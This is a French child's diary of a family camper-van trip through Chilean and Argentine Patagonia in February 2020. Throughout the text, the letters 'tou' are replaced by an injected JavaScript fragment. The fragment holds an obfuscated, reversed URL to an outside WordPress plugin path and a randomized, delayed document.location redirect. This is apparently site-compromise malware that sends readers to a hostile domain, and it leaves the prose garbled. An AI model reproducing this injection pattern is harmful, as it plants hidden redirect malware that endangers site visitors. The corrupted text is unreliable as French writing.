Vendredi 14 février 2020
Nous sommes passés au Chili pour commencer le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour du lac General Carrera (4 jours de piste) !!! Le lac est bleu turquoise, c’était très joli. Il est parfois même d’une couleur laiteuse ! J’ai vraiment beaucoup aimé !
Dimanche 16 février
Le soir nous sommes allés jouer dans un parc à Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Rio Tranquilo et nous avons rencontré deux filles françaises, Suzanne et Louise, qui sont très sympas. Papa et maman ont rencontré leurs parents et nous sommes allés au restaurant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les 8.
Lundi 17 février Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Rio Tranquilo Chili
Ce matin nous avons pris un bateau pour aller voir des cathédrales de marbres dans le lac General Carrera. C’est du marbre creusé par l’eau, nous sommes rentrés dans plusieurs grottes. C’était magnifique !!!
Pour le retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour les vagues étaient très hautes et le bateau tanguait et tapait contre les vagues. On entendait que moi et Clément rigoler, enfin surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout Clément !
Mercredi 19 février
Nous avons remonté la carretera austral, une mauvaise piste avec que des trous mais parfois de la vraie route. Le paysage qui nous entoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourait était très beau, il y avait aussi beaucoup de poussière.
Jeudi 20 février Parque National Quelat, Chili
Nous avons fait une petite rando pour aller voir un glacier suspendu qui risque de disparaître dans 10 ou 20. Au retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour nous avons encore croisé des français et nous avons fait le pique-nique avec eux sur un rocher très plat au bord d’une rivière. Ils sont partis tôt car ils avaient un bus à prendre. En partant il a fallu traverser un pont qui ne pouvait supporter que 5 personnes et donc il y avait une longue queue.
Vendredi 21 février Futaleufeu Chili
Après une bonne journée de piste bien poussiéreuse, nous nous sommes arrêtés au bord d’une rivière qui était à 12 degrés. Papa et moi avons pris notre douche dedans. Clément, lui a juste mis du savon mais il avait trop froid donc il s’est rincé dans le camping-car. Maman, qui est trop frileuse, a pris complètement sa douche dans le camping-car. Le soir nous avons fait un bon feu de bois pour se réchauffer, un couple de français et un couple de belge sont venus juste après. On a mangé et on a passé la soirée avec eux.
Samedi 22 février 2020 Parque National Los Alerces, Argentine
Nous avons passé la frontière du Chili vers l’Argentine, le soir nous sommes allés dans le camping du parc Los Alerces, nous avons fait un bon feu de bois pour faire griller des saucisses qui étaient très bonnes.
Dimanche 23 février Parque National Los Alerces, Argentine
Aujourd’hui nous avons fait une petite randonnée pour voir des piscines naturelle et des cascades. Papa a essayé de se baigner mais l’eau était trop froide.
L’après-midi nous avons fait une autre petite randonnée pour aller voir un arbre qui a 800 ans.
Lundi 24 février El Bolson, Argentine
Aujourd’hui on a fait 2 petites randonnées pour voir un Alerce qui a 300 ans et un mirador pour voir les rios. Le soir nous avons dormi dans un camping à El Bolson, il y avait un trampoline et un petit chiot qui avait 1 mois et demi. Il était trop mignon. Il était blanc et noir comme Marley en bébé. Pendant qu’on jouait au trampoline, Papa et maman ont rencontré des français qui ont un fils de 10 ans, Hugo. Ils voyageaient en 4×4 avec une toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute petite remorque pour dormir. On a passé la soirée avec eux. Papa et maman ont commandé des pizzas et on a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous mangé dans le camion car il faisait froid.
Mardi 25 février. El Bolson Argentine
Ce matin nous avons pris un taxi pour aller voir le marché artisanal de El Bolson. Il y a plein de choses différentes c’était très grand et très joyeux. On a acheté du fil et des perles pour faire nos bracelets, des petits porte-monnaies car j’ai perdu le mien. On a aussi acheté une bague pour mon anniversaire et des fruits qu’on a mangés toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout de suite.
Mercredi 26 février, El Bolson Argentine
Aujourd’hui nous sommes resté au camping, nous avons joué avec Hugo au trampoline et avec le petit chien Manta.
Jeudi 27 février Bariloche Argentine
Ce matin nous avons roulé puis vers l’après-midi nous avons acheté des bons chocolats dans une chocolaterie. Le soir nous avons dormi au bord d’un lac et nous avons rencontré des Chiliens et des Argentins. La dame Argentine, Paola, a fait des Alfajores et nous les a donnés. C’était trop bon !
Vendredi 28 février, Bariloche Argentine
Le matin Papa a demandé à Rodriguo de regarder le moteur du camping-car pour voir si il y avait un problème. Pendant ce temps nous avons fait des devoirs. Rodriguo a dit que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout allait bien et nous sommes partis.